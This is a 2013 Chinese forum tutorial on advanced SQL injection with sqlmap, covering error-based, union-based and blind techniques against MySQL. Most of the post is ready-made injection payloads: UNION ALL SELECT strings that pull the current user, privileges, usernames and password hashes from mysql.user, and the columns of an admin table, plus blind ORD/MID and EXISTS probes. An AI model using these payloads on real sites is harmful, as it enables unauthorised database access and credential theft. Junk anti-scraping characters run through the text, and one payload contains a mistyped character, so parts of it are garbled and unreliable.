找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
9 i1 J8 p) r3 H9 U  |+ R5 D8 t
0 k1 Y+ t+ @6 _3 p这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表. N/ k( X7 g" t: O+ L: c  Y
) Q3 d/ S/ _8 F) ?) Y, Q9 `  n
分类标准        分类        备注
2 p( H3 R) s/ ~* E) Z3 I按字段类型        整型注入,字符型注入       
6 _2 q* }* W) m' u+ Z按出现的位置        get注入,post注入,cookie注入,http header注入        ( p0 }+ m. L# Z6 R, S
然而高级注入是这样的9 T  G* I( r0 i- _; @
! h2 H' q3 `% r% @
高级注入分类        条件
& O% |7 ~9 w3 e  X0 X' ]2 M. V6 Rerror-based sql        数据库的错误回显可以返回,存在数据库,表结构
" z. h1 v# @& C6 h+ B6 ]union-based sql        能够使用union,存在数据库,表结构0 f2 @# e1 ?" m% n" X# @" X4 {
blind sql        存在注入# M3 v7 Y( o( k- C
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
$ U" |+ q2 Q5 O/ p, Z3 e2 k
* i4 n! n  j- j0 j" W$ u好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火' n$ z, J/ j8 ?2 K1 {  w, h' ]- [7 a
% R, {/ ~  Z; t* u, ~
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
, v0 L1 K4 k* n0 H 0 t( J* b+ x- Q- J; a
这里用mysql说明7 }9 n# ^( x# ?7 w6 ~8 Q
& t" V4 [4 W. u# V  o3 C) x! N
e注入坛子里很多了,请看戳我或者再戳我+ ^! z3 o+ J/ ~" w" B& a
$ S* S1 C) l8 d! h' @
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
1 f9 r! Q) L  \3 d7 j 1 M) k( x7 F/ S; `" P
获取当前数据库用户名3 p8 W* y9 |& N/ G% z1 i' d
# w5 P% t: f! C6 Y
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
% R: E1 |" S: A* G! b* U5 \1 bAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL$ z( Y3 ?$ `& p5 U5 P$ W4 {! |
L, NULL#
  l. H) N( U% e! l& c$ x$ v" T注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。5 R) S1 M& I: M/ w! C% n
) V, h! g9 n( J: g
获取数据库名& a+ [: w" H2 ?1 t' ]. v
7 _; [. v9 Q( N& z$ e8 J9 M
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#! l: i( ^  P3 Y. O7 P. v$ P& G6 X
获取所有用户名
/ J$ J9 N# n' j, g1 D, T
) V7 G6 z4 I: @$ _7 C; Z+ i0 uUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
3 c' C: o8 a4 t- X查看当前用户权限7 x5 M8 W! q! i4 P
' a$ V1 e8 x, j. n3 @
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
  q' K: F8 L" v: c: S8 Y3 g3 I% j尝试获取密码,当然需要有能读mysql数据库的权限# _0 D. W4 t3 i6 x  x) X7 p5 @

# S/ H5 [7 w" OUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#8 e. r7 c! d3 |! O
获取表名,limit什么的自己搞啦6 [6 K$ _* P/ m3 ?, M2 G2 i  f. t" J
3 q' @# ?+ s! P% s
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
; s5 D  g8 l# ]% n获取字段名及其类型8 a! {9 g; _; U, k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#; i+ _7 X# |. w* U

% _3 s" P2 ]3 [& K' T- \' |1 {5 Sb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
+ }& m# {1 R& R  c
3 J0 f7 \) m" l, [9 ~  ^如:6 b: D; l% p3 |/ I& m; v
获取当前用户名
# v5 i& D% @! ~* Y' Q# z * i  a( X% Q- a' S
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116" |! Q7 H3 F- T
获取当前数据库% T: ^, z/ u1 R

! n7 M  F4 P3 HAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106( ^, }6 h2 k. H
获取表名, B( s2 i6 F5 y0 C

  p0 D2 N% s4 M1 q0 sAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
% P1 e" C+ f, g7 R. U; {获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
  b* y7 i* {4 c6 [9 [! O# |/ ?3 M, t回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
7 ]% a% \3 p" b- b2 H9 N& e/ Y. S爆表4 g) V/ h* M3 j( p% d, B( G

8 W: e& @6 H+ v% Z' pAND EXISTS(select * from table)4 A& P$ X& u# ^, H* H
爆字段
, d. ~+ u; {& `7 M. \  u
8 a) L, \! f1 J5 b. NAND EXISTS(select pwd from table)0 a) Z6 d: L" D. A
盲注的变化就比较多了,由于篇幅,只是举个例子而已。! R9 f) m  J& V0 b$ D! e) E

' U: a! ^3 w  V6 t3 d本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。$ Z, h9 O" L, G- W9 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表